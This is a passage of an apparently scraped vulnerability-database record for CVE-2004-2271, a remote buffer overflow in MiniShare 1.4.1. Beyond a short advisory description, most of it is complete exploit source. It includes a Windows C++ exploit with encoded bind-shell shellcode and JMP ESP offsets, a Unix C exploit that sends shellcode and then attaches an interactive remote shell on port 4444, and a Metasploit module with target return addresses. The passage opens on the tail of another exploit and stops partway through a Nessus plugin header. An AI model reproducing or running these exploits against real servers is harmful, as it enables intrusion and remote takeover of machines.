\"\\nExploit Sended \", len(buffer) \nexcept: \nprint \"Connection error\" \n \n \n \n3. Solution: \n \nThis product is deprecated \n \n--> \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/150689/minishare141-overflow.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2004-2271"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in MiniShare. The application fails to perform proper bounds checking resulting in a buffer overflow. 
With a specially crafted HTTP GET request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 1.4.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in MiniShare. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted HTTP GET request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://minishare.sourceforge.net\nSecurity Tracker: 1012106\n[Secunia Advisory ID:13114](https://secuniaresearch.flexerasoftware.com/advisories/13114/)\nOther Advisory URL: http://www.securiteam.com/exploits/6X00B1PBPC.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html\nISS X-Force ID: 17978\n[CVE-2004-2271](https://vulners.com/cve/CVE-2004-2271)\nBugtraq ID: 11620\n", "modified": "2004-11-07T11:40:13", "published": "2004-11-07T11:40:13", "id": "OSVDB:11530", "href": "https://vulners.com/osvdb/OSVDB:11530", "title": "MiniShare HTTP GET Request Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T12:33:00", "description": "MiniShare. CVE-2004-2271. 
Remote exploit for windows platform", "published": "2004-11-07T00:00:00", "type": "exploitdb", "title": "MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2271"], "modified": "2004-11-07T00:00:00", "id": "EDB-ID:616", "href": "https://www.exploit-db.com/exploits/616/", "sourceData": "/*\r\n\r\n\r\n\r\nMiniShare <= 1.4.1, Remote Buffer Overflow Exploit v0.1.\r\nBind a shellcode to the port 101.\r\n\r\nFull disclosure and exploit \r\nby class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet\r\n07 november 2004\r\n\r\nThanx to HDMoore and Metasploit.com for their kickass ASM work.\r\n\r\n\r\n------------------\r\nWHAT IS MINISHARE\r\n------------------\r\n\r\nHomepage - http://minishare.sourceforge.net/\r\n\t\r\n\tMiniShare is meant to serve anyone who has the need to share files to anyone,\r\n\tdoesn't have a place to store the files on the web, \r\n and does not want or simply does not have the skill\r\n\tand possibility to set up and maintain a complete HTTP-server software...\r\n\r\n--------------\r\nVULNERABILITY\r\n--------------\r\n\r\n\tA simple buffer overflow in the link length, nothing more\r\n\tread the code for further instructions.\r\n\r\n----\r\nFIX\r\n----\r\n\r\n\tActually none, the vendor is contacted the same day published, 1 hour before you.\r\n As a nice fuck to NGSS , iDEFENSE and all others private disclosures\r\n\thomo crew ainsi que K-OTiK, ki se tap' des keu dans leur \"Lab\"\r\n\tlol :->\r\n\r\n----\r\nEXTRA\r\n----\r\n \r\n\tUpdate the JMP ESP if you need. 
A wrong offset will crash minishare.\r\n\tCode tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English\r\n\tOthers MiniShare's versions aren't tested.\r\n Tip: If it crashes for you , try to play with Sleep()...\r\n\r\n----\r\nBY\r\n----\r\n\r\n class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet\r\n\t\t\t\t\t\t who\r\n\t\t\t\t\t\tgreets\r\n DiabloHorn [at] www.kd-team.com [&] #kd-team [at] EFnet\r\n\r\n*/\r\n\r\n\r\n\r\n\r\n#include \"winsock2.h\"\r\n#include \"fstream.h\"\r\n\r\n#pragma comment(lib, \"ws2_32\")\r\n\r\n\r\n\r\n\r\n//380 bytes, BIND shellcode port 101, XORed 0x88, thanx HDMoore. \r\n\r\nchar scode[] =\r\n\"\\xEB\"\r\n\"\\x0F\\x58\\x80\\x30\\x88\\x40\\x81\\x38\\x68\\x61\\x63\\x6B\\x75\\xF4\\xEB\\x05\\xE8\\xEC\\xFF\\xFF\"\r\n\"\\xFF\\x60\\xDE\\x88\\x88\\x88\\xDB\\xDD\\xDE\\xDF\\x03\\xE4\\xAC\\x90\\x03\\xCD\\xB4\\x03\\xDC\\x8D\"\r\n\"\\xF0\\x89\\x62\\x03\\xC2\\x90\\x03\\xD2\\xA8\\x89\\x63\\x6B\\xBA\\xC1\\x03\\xBC\\x03\\x89\\x66\\xB9\"\r\n\"\\x77\\x74\\xB9\\x48\\x24\\xB0\\x68\\xFC\\x8F\\x49\\x47\\x85\\x89\\x4F\\x63\\x7A\\xB3\\xF4\\xAC\\x9C\"\r\n\"\\xFD\\x69\\x03\\xD2\\xAC\\x89\\x63\\xEE\\x03\\x84\\xC3\\x03\\xD2\\x94\\x89\\x63\\x03\\x8C\\x03\\x89\"\r\n\"\\x60\\x63\\x8A\\xB9\\x48\\xD7\\xD6\\xD5\\xD3\\x4A\\x80\\x88\\xD6\\xE2\\xB8\\xD1\\xEC\\x03\\x91\\x03\"\r\n\"\\xD3\\x84\\x03\\xD3\\x94\\x03\\x93\\x03\\xD3\\x80\\xDB\\xE0\\x06\\xC6\\x86\\x64\\x77\\x5E\\x01\\x4F\"\r\n\"\\x09\\x64\\x88\\x89\\x88\\x88\\xDF\\xDE\\xDB\\x01\\x6D\\x60\\xAF\\x88\\x88\\x88\\x18\\x89\\x88\\x88\"\r\n\"\\x3E\\x91\\x90\\x6F\\x2C\\x91\\xF8\\x61\\x6D\\xC1\\x0E\\xC1\\x2C\\x92\\xF8\\x4F\\x2C\\x25\\xA6\\x61\"\r\n\"\\x51\\x81\\x7D\\x25\\x43\\x65\\x74\\xB3\\xDF\\xDB\\xBA\\xD7\\xBB\\xBA\\x88\\xD3\\x05\\xC3\\xA8\\xD9\"\r\n\"\\x77\\x5F\\x01\\x57\\x01\\x4B\\x05\\xFD\\x9C\\xE2\\x8F\\xD1\\xD9\\xDB\\x77\\xBC\\x07\\x77\\xDD\\x8C\"\r\n\"\\xD1\\x01\\x8C\\x06\\x6A\\x7A\\xA3\\xAF\\xDC\\x77\\xBF\\x77\\xDD\\xB8\\xB9\\x48\\xD8\\xD8\\xD8\\xD8\"\r\n\"\\xC8\\xD8\\xC8\\xD8\
\x77\\xDD\\xA4\\x01\\x4F\\xB9\\x53\\xDB\\xDB\\xE0\\x8A\\x88\\x88\\xED\\x01\\x68\"\r\n\"\\xE2\\x98\\xD8\\xDF\\x77\\xDD\\xAC\\xDB\\xDF\\x77\\xDD\\xA0\\xDB\\xDC\\xDF\\x77\\xDD\\xA8\\x01\\x4F\"\r\n\"\\xE0\\xCB\\xC5\\xCC\\x88\\x01\\x6B\\x0F\\x72\\xB9\\x48\\x05\\xF4\\xAC\\x24\\xE2\\x9D\\xD1\\x7B\\x23\"\r\n\"\\x0F\\x72\\x09\\x64\\xDC\\x88\\x88\\x88\\x4E\\xCC\\xAC\\x98\\xCC\\xEE\\x4F\\xCC\\xAC\\xB4\\x89\\x89\"\r\n\"\\x01\\xF4\\xAC\\xC0\\x01\\xF4\\xAC\\xC4\\x01\\xF4\\xAC\\xD8\\x05\\xCC\\xAC\\x98\\xDC\\xD8\\xD9\\xD9\"\r\n\"\\xD9\\xC9\\xD9\\xC1\\xD9\\xD9\\xDB\\xD9\\x77\\xFD\\x88\\xE0\\xFA\\x76\\x3B\\x9E\\x77\\xDD\\x8C\\x77\"\r\n\"\\x58\\x01\\x6E\\x77\\xFD\\x88\\xE0\\x25\\x51\\x8D\\x46\\x77\\xDD\\x8C\\x01\\x4B\\xE0\\x77\\x77\\x77\"\r\n\"\\x77\\x77\\xBE\\x77\\x5B\\x77\\xFD\\x88\\xE0\\xF6\\x50\\x6A\\xFB\\x77\\xDD\\x8C\\xB9\\x53\\xDB\\x77\"\r\n\"\\x58\\x68\\x61\\x63\\x6B\\x90\";\r\n\r\n/*\r\n\r\n//116 bytes, execute regedit.exe, XORed 0x88, hardcoded WinXP SP1 English\r\n\r\nchar scode+[] =\r\n\"\\xEB\"\r\n\"\\x0F\\x58\\x80\\x30\\x88\\x40\\x81\\x38\\x68\\x61\\x63\\x6B\\x75\\xF4\\xEB\\x05\\xE8\\xEC\\xFF\\xFF\"\r\n\"\\xFF\\xDD\\x01\\x6D\\x09\\x64\\xC4\\x88\\x88\\x88\\xDB\\x05\\xF5\\x3C\\x4E\\xCD\\x7C\\xFA\\x4E\\xCD\"\r\n\"\\x7D\\xED\\x4E\\xCD\\x7E\\xEF\\x4E\\xCD\\x7F\\xED\\x4E\\xCD\\x70\\xEC\\x4E\\xCD\\x71\\xE1\\x4E\\xCD\"\r\n\"\\x72\\xFC\\x4E\\xCD\\x73\\xA6\\x4E\\xCD\\x74\\xED\\x4E\\xCD\\x75\\xF0\\x4E\\xCD\\x76\\xED\\x4E\\xCD\"\r\n\"\\x77\\x88\\xE0\\x8D\\x88\\x88\\x88\\x05\\xCD\\x7C\\xD8\\x30\\xE8\\x75\\x6E\\xFF\\x77\\x58\\xE0\\x89\"\r\n\"\\x88\\x88\\x88\\x30\\xEB\\x10\\x6F\\xFF\\x77\\x58\\x68\\x61\\x63\\x6B\\x90\";\r\n\r\n//565 bytes, execute regedit.exe, alphanumeric, hardcoded WinXP SP1 English\r\n\r\nchar 
scode+[]=\r\n\"LLLLYhbSgCX5bSgCHQVPPTQPPaRVVUSBRDJfh2ADTY09VQa0tkafhXMfXf1Dkbf1TkbjgY0Lkd0TkdfhH\"\r\n\"CfYf1LkfjiY0Lkh0tkjjOX0Dkkf1TkljxY0Lko0Tko0TkqjfY0Lks0tks0Tkuj1Y0Lkw0tkw0tkyCjyY0\"\r\n\"Lkz0TkzCC0tkzCCjmY0Lkz0TkzCC0TkzCCjhX0Dkz0tkzCC0tkzCCjPX0Dkz0TkzCC0tkzCCjfY0Lkz0T\"\r\n\"kzCjjX0DkzC0TkzCCjeX0Dkz0tkzCC0TkzCCjvX0Dkz0tkzCC0TkzCCj3X0Dkz0tkzCC0tkzCCjOX0Dkz\"\r\n\"0tkzCjaX0DkzCChuucTX1DkzCCCC0tkzCCjaY0Lkz0TkzCC0tkzCjRY0LkzCfhNUfXf1Dkzf1TkzCCCfh\"\r\n\"hhfYf1Lkzf1TkzCCChS4ciX1DkzCCCC0TkzCC0tkzCjKY0Lkz0TkzCCfhzhfXf1Dkzf1TkzUvB3tLHCiS\"\r\n\"r2K9Esr9Ele9E8g9Eqe9Ejd9Eni9EUt9EbD9Efe9Etx9E2e9EOahpucTrEjPG2LLwhGhR4ciGcgSwzG\";\r\n\r\n*/\r\n\r\nstatic char payload[5000];\r\n\r\nchar espxp1en[]=\"\\x33\\x55\\xdc\\x77\"; //JMP ESP - user32.dll - WinXP SP1 English\r\nchar esp2k4en[]=\"\\xb8\\x9e\\xe3\\x77\"; //JMP ESP - user32.dll - Win2k SP4 English\r\nchar espnt6en[]=\"\\xf8\\x29\\xf3\\x77\"; //JMP ESP - kernel32.dll - WinNT SP6 English\r\n\r\nvoid usage(char* us);\r\nWSADATA wsadata;\r\nvoid ver();\r\n\r\nint main(int argc,char *argv[])\r\n{\r\n\tver();\r\n\tif ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>2)){usage(argv[0]);return -1;}\r\n\tif (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<\"[+] wsastartup error: \"<<WSAGetLastError()<<endl;return -1;}\r\n\tint ip=htonl(inet_addr(argv[2])), sz, port, sizeA, sizeB, sizeC, a, b, c;\r\n\tchar *target, *os;\r\n\tif (argc==4){port=atoi(argv[3]);}\r\n\telse port=80;\r\n\tif (atoi(argv[1]) == 1){target=espxp1en;os=\"WinXP SP1 English\";}\r\n\tif (atoi(argv[1]) == 2){target=esp2k4en;os=\"Win2k SP4 English\";}\r\n\tif (atoi(argv[1]) == 3){target=espnt6en;os=\"WinNT SP6 English\";}\r\n\tSOCKET s;\r\n\tstruct fd_set mask;\r\n\tstruct timeval timeout; \r\n\tstruct sockaddr_in server;\r\n\ts=socket(AF_INET,SOCK_STREAM,0);\r\n\tif (s==INVALID_SOCKET){ cout<<\"[+] socket() error: \"<<WSAGetLastError()<<endl;WSACleanup();return -1;}\r\n\tcout<<\"[+] target: 
\"<<os<<endl;\t\t\t\r\n\tserver.sin_family=AF_INET;\r\n\tserver.sin_addr.s_addr=htonl(ip);\r\n\tserver.sin_port=htons(port);\r\n\tWSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);\r\n\ttimeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);\r\n\tswitch(select(s+1,NULL,&mask,NULL,&timeout))\r\n\t{\r\n\t\tcase -1: {cout<<\"[+] select() error: \"<<WSAGetLastError()<<endl;closesocket(s);return -1;}\r\n\t\tcase 0: {cout<<\"[+] connection failed.\"<<endl;closesocket(s);return -1;}\r\n\t\tdefault:\r\n\t\tif(FD_ISSET(s,&mask))\r\n\t\t{\r\n\t\t\tcout<<\"[+] connected, constructing the payload...\"<<endl;\r\n\t\t\tSleep(1000);\r\n\t\t\tsizeA=1787;\r\n\t\t\tsizeB=414-sizeof(scode);\r\n\t\t\tsizeC=10;\r\n\t\t\tsz=sizeA+sizeB+sizeC+sizeof(scode)+17;\r\n\t\t\tmemset(payload,0,sizeof(payload));\r\n\t\t\tstrcat(payload,\"GET \");\r\n\t\t\tfor (a=0;a<sizeA;a++){strcat(payload,\"\\x41\");}\r\n\t\t\tstrcat(payload,target);\r\n\t\t\tfor (b=0;b<sizeB;b++){strcat(payload,\"\\x41\");}\r\n\t\t\tstrcat(payload,scode);\r\n\t\t\tfor (c=0;c<sizeC;c++){strcat(payload,\"\\x41\");}\r\n\t\t\tstrcat(payload,\" HTTP/1.1\\r\\n\\r\\n\");\r\n\t\t\tSleep(1000);\r\n\t\t if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<\"[+] sending error, the server prolly rebooted.\"<<endl;return -1;}\r\n\t\t\tSleep(1000);\r\n\t\t\tcout<<\"[+] size of payload: \"<<sz<<endl;\t\t\t\r\n\t\t\tcout<<\"[+] payload send, connect the port 101 to get a shell.\"<<endl;\r\n\t\t\treturn 0;\r\n\t\t}\r\n\t}\r\n\tclosesocket(s);\r\n\tWSACleanup();\r\n\treturn 0;\r\n}\r\n\r\n\r\nvoid usage(char* us) \r\n{ \r\n\tcout<<\"USAGE: 101_mini.exe Target Ip Port\\n\"<<endl;\r\n\tcout<<\"TARGETS: \"<<endl;\r\n\tcout<<\" [+] 1. WinXP SP1 English (*)\"<<endl;\r\n\tcout<<\" [+] 2. Win2k SP4 English (*)\"<<endl;\r\n\tcout<<\" [+] 3. 
WinNT SP6 English (*)\"<<endl;\r\n\tcout<<\"NOTE: \"<<endl;\r\n\tcout<<\" The port 80 is default if no port specified\"<<endl;\r\n\tcout<<\" The exploit bind a shellcode to the port 101\"<<endl;\r\n\tcout<<\" A wildcard (*) mean Tested.\"<<endl;\r\n\treturn;\r\n} \r\n\r\nvoid ver()\r\n{\t\r\ncout<<endl;\r\ncout<<\" \"<<endl;\r\ncout<<\" ===================================================[v0.1]====\"<<endl;\r\ncout<<\" ====MiniShare, Minimal HTTP Server for Windows <= v1.4.1=====\"<<endl; \r\ncout<<\" =============Remote Buffer Overflow Exploit==================\"<<endl;\r\ncout<<\" ====coded by class101===========[DFind.kd-team.com 2004]=====\"<<endl;\r\ncout<<\" =============================================================\"<<endl;\r\ncout<<\" \"<<endl;\r\n}\r\n\r\n// milw0rm.com [2004-11-07]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/616/"}, {"lastseen": "2016-01-31T12:35:05", "description": "MiniShare Remote Buffer Overflow Exploit (c source). CVE-2004-2271. 
Remote exploit for windows platform", "published": "2004-11-16T00:00:00", "type": "exploitdb", "title": "MiniShare 1.4.1 - Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2271"], "modified": "2004-11-16T00:00:00", "id": "EDB-ID:636", "href": "https://www.exploit-db.com/exploits/636/", "sourceData": "/*\r\nno@0x00:~/Exploits/minishare$ ./mini-exploit 10.20.30.2\r\n\r\n***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***\r\n\r\n[x] Connected to: 10.20.30.2 on port 80.\r\n[x] Sending bad code..done.\r\n[x] Trying to connect to: 10.20.30.2 on port 4444..\r\n[x] 0wn3d!\r\n\r\nMicrosoft Windows 2000 [Version 5.00.2195]\r\n(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\nE:\\Program Files\\MiniShare>\r\n\r\nGreetz to NtWaK0,kane,kamalo,foufz, and schap :)\r\nhttp://NoPh0BiA.lostspirits.org\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <errno.h>\r\n#include <netinet/in.h>\r\n#include <fcntl.h>\r\n\r\n#define PORT 80\r\n#define PORT1 4444\r\n#define RET \"\\xB8\\x9E\\xE3\\x77\" /*2k sp2*/\r\n\r\nchar 
shellcode[]=\r\n\"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\x34\\x0a\"\r\n\"\\x2f\\xfd\\x83\\xeb\\xfc\\xe2\\xf4\\xc8\\xe2\\x79\\xfd\\x34\\x0a\\x7c\\xa8\\x62\"\r\n\"\\x5d\\xa4\\x91\\x10\\x12\\xa4\\xb8\\x08\\x81\\x7b\\xf8\\x4c\\x0b\\xc5\\x76\\x7e\"\r\n\"\\x12\\xa4\\xa7\\x14\\x0b\\xc4\\x1e\\x06\\x43\\xa4\\xc9\\xbf\\x0b\\xc1\\xcc\\xcb\"\r\n\"\\xf6\\x1e\\x3d\\x98\\x32\\xcf\\x89\\x33\\xcb\\xe0\\xf0\\x35\\xcd\\xc4\\x0f\\x0f\"\r\n\"\\x76\\x0b\\xe9\\x41\\xeb\\xa4\\xa7\\x10\\x0b\\xc4\\x9b\\xbf\\x06\\x64\\x76\\x6e\"\r\n\"\\x16\\x2e\\x16\\xbf\\x0e\\xa4\\xfc\\xdc\\xe1\\x2d\\xcc\\xf4\\x55\\x71\\xa0\\x6f\"\r\n\"\\xc8\\x27\\xfd\\x6a\\x60\\x1f\\xa4\\x50\\x81\\x36\\x76\\x6f\\x06\\xa4\\xa6\\x28\"\r\n\"\\x81\\x34\\x76\\x6f\\x02\\x7c\\x95\\xba\\x44\\x21\\x11\\xcb\\xdc\\xa6\\x3a\\xb5\"\r\n\"\\xe6\\x2f\\xfc\\x34\\x0a\\x78\\xab\\x67\\x83\\xca\\x15\\x13\\x0a\\x2f\\xfd\\xa4\"\r\n\"\\x0b\\x2f\\xfd\\x82\\x13\\x37\\x1a\\x90\\x13\\x5f\\x14\\xd1\\x43\\xa9\\xb4\\x90\"\r\n\"\\x10\\x5f\\x3a\\x90\\xa7\\x01\\x14\\xed\\x03\\xda\\x50\\xff\\xe7\\xd3\\xc6\\x63\"\r\n\"\\x59\\x1d\\xa2\\x07\\x38\\x2f\\xa6\\xb9\\x41\\x0f\\xac\\xcb\\xdd\\xa6\\x22\\xbd\"\r\n\"\\xc9\\xa2\\x88\\x20\\x60\\x28\\xa4\\x65\\x59\\xd0\\xc9\\xbb\\xf5\\x7a\\xf9\\x6d\"\r\n\"\\x83\\x2b\\x73\\xd6\\xf8\\x04\\xda\\x60\\xf5\\x18\\x02\\x61\\x3a\\x1e\\x3d\\x64\"\r\n\"\\x5a\\x7f\\xad\\x74\\x5a\\x6f\\xad\\xcb\\x5f\\x03\\x74\\xf3\\x3b\\xf4\\xae\\x67\"\r\n\"\\x62\\x2d\\xfd\\x25\\x56\\xa6\\x1d\\x5e\\x1a\\x7f\\xaa\\xcb\\x5f\\x0b\\xae\\x63\"\r\n\"\\xf5\\x7a\\xd5\\x67\\x5e\\x78\\x02\\x61\\x2a\\xa6\\x3a\\x5c\\x49\\x62\\xb9\\x34\"\r\n\"\\x83\\xcc\\x7a\\xce\\x3b\\xef\\x70\\x48\\x2e\\x83\\x97\\x21\\x53\\xdc\\x56\\xb3\"\r\n\"\\xf0\\xac\\x11\\x60\\xcc\\x6b\\xd9\\x24\\x4e\\x49\\x3a\\x70\\x2e\\x13\\xfc\\x35\"\r\n\"\\x83\\x53\\xd9\\x7c\\x83\\x53\\xd9\\x78\\x83\\x53\\xd9\\x64\\x87\\x6b\\xd9\\x24\"\r\n\"\\x5e\\x7f\\xac\\x65\\x5b\\x6e\\xac\\x7d\\x5b\\x7e\\xae\\x65\\xf5\\x5a\\xfd\\x5c\"\r\n\"\\x78\\xd1\\x4e\\x22\\xf5\\x7a\\xf9\\xcb\\xda\
\xa6\\x1b\\xcb\\x7f\\x2f\\x95\\x99\"\r\n\"\\xd3\\x2a\\x33\\xcb\\x5f\\x2b\\x74\\xf7\\x60\\xd0\\x02\\x02\\xf5\\xfc\\x02\\x41\"\r\n\"\\x0a\\x47\\x0d\\xbe\\x0e\\x70\\x02\\x61\\x0e\\x1e\\x26\\x67\\xf5\\xff\\xfd\";\r\n\r\nstruct sockaddr_in hrm;\r\n\r\nvoid shell(int sock)\r\n{\r\nfd_set fd_read;\r\nchar buff[1024];\r\nint n;\r\n\r\nwhile(1) {\r\nFD_SET(sock,&fd_read);\r\nFD_SET(0,&fd_read);\r\n\r\nif(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;\r\n\r\nif( FD_ISSET(sock, &fd_read) ) {\r\nn=read(sock,buff,sizeof(buff));\r\nif (n == 0) {\r\nprintf (\"Connection closed.\\n\");\r\nexit(EXIT_FAILURE);\r\n} else if (n < 0) {\r\nperror(\"read remote\");\r\nexit(EXIT_FAILURE);\r\n}\r\nwrite(1,buff,n);\r\n}\r\n\r\nif ( FD_ISSET(0, &fd_read) ) {\r\nif((n=read(0,buff,sizeof(buff)))<=0){\r\nperror (\"read user\");\r\nexit(EXIT_FAILURE);\r\n}\r\nwrite(sock,buff,n);\r\n}\r\n}\r\nclose(sock);\r\n}\r\n\r\nint conn(char *ip, int p)\r\n{\r\nint sockfd;\r\nhrm.sin_family = AF_INET;\r\nhrm.sin_port = htons(p);\r\nhrm.sin_addr.s_addr = inet_addr(ip);\r\nbzero(&(hrm.sin_zero),8);\r\nsockfd=socket(AF_INET,SOCK_STREAM,0);\r\nif((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr))) < 0 )\r\n{\r\nperror(\"connect\");\r\nexit(0);\r\n}\r\nreturn sockfd;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\nif(argc < 2)\r\n{\r\nprintf(\"Usage: TARGET.\\n\");\r\nexit(0);\r\n}\r\nchar *buffer = malloc(2220),*B=malloc(30),*target=argv[1];\r\nint x,y;\r\nprintf(\"\\n***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***\\n\\n\");\r\nmemset(buffer,'\\0',2220);\r\nmemset(B,0x42,30);\r\nmemset(buffer,0x41,1787);\r\nstrcat(buffer,RET);\r\nstrcat(buffer,B);\r\nstrcat(buffer,shellcode);\r\nif((x = conn(target,PORT)))\r\nprintf(\"[x] Connected to: %s on port %d.\\n\",target,PORT);\r\nsleep(3);\r\nprintf(\"[x] Sending bad code..\");\r\nwrite(x,\"GET \",4);\r\nwrite(x,buffer,2220);\r\nwrite(x,\" HTTP/1.1\\r\\n\\r\\n\",13);\r\nsleep(3);\r\nprintf(\"done.\\n\");\r\nprintf(\"[x] Trying to 
connect to: %s on port %d..\\n\",target,PORT1);\r\nif((y=conn(target,PORT1)))\r\n{\r\nprintf(\"[x] 0wn3d!\\n\\n\");\r\nshell(y);\r\n}\r\n\r\n}\r\n\r\n// milw0rm.com [2004-11-16]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/636/"}, {"lastseen": "2016-02-02T06:26:29", "description": "Minishare 1.4.1 Buffer Overflow. CVE-2004-2271. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Minishare 1.4.1 - Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2271"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16754", "href": "https://www.exploit-db.com/exploits/16754/", "sourceData": "##\r\n# $Id: minishare_get_overflow.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Minishare 1.4.1 Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis is a simple buffer overflow for the minishare web\r\n\t\t\t\tserver. This flaw affects all versions prior to 1.4.2. This\r\n\t\t\t\tis a plain stack buffer overflow that requires a \"jmp esp\" to reach\r\n\t\t\t\tthe payload, making this difficult to target many platforms\r\n\t\t\t\tat once. This module has been successfully tested against\r\n\t\t\t\t1.4.1. 
Version 1.3.4 and below do not seem to be vulnerable.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'acaro <acaro@jervus.it>' ],\r\n\t\t\t'License' => BSD_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2004-2271'],\r\n\t\t\t\t\t[ 'OSVDB', '11530'],\r\n\t\t\t\t\t[ 'BID', '11620'],\r\n\t\t\t\t\t[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x40\",\r\n\t\t\t\t\t'MinNops' => 64,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp\r\n\t\t\t\t\t['Windows 2000 SP4 English', { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp\r\n\t\t\t\t\t['Windows XP SP0-SP1 English', { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret\r\n\t\t\t\t\t['Windows XP SP2 English', { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret\r\n\t\t\t\t\t['Windows 2003 SP0 English', { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret\r\n\t\t\t\t\t['Windows NT 4.0 SP6', { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp\r\n\t\t\t\t\t['Windows XP SP2 German', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp\r\n\t\t\t\t\t['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp\r\n\t\t\t\t\t['Windows XP SP2 French', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Nov 7 2004'))\r\n\tend\r\n\r\n\tdef exploit\r\n\t\turi = rand_text_alphanumeric(target['Rets'][0])\r\n\t\turi << [target['Rets'][1]].pack('V')\r\n\t\turi << payload.encoded\r\n\r\n\t\tprint_status(\"Trying target address 0x%.8x...\" % target['Rets'][1])\r\n\t\tsend_request_raw({\r\n\t\t\t'uri' => uri\r\n\t\t}, 
5)\r\n\r\n\t\thandler\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16754/"}], "nessus": [{"lastseen": "2020-06-16T02:55:12", "description": "MiniShare 1.4.1 and prior versions are affected by a buffer overflow \nflaw. A remote attacker could execute arbitrary commands by sending a\nspecially crafted file name in a the GET request.\n\nVersion 1.3.4 and below do not seem to be vulnerable.", "edition": 22, "published": "2005-06-06T00:00:00", "title": "MiniShare Webserver HTTP GET Request Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-2271"], "modified": "2005-06-06T00:00:00", "cpe": [], "id": "MINISHARE_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/18424", "sourceData": "#\n# written by Gareth Phillips - SensePost PTY ltd (www.sensepost.com)\n#\n# Changes by Tenable:\n# - detect title to prevent false positives\n# - 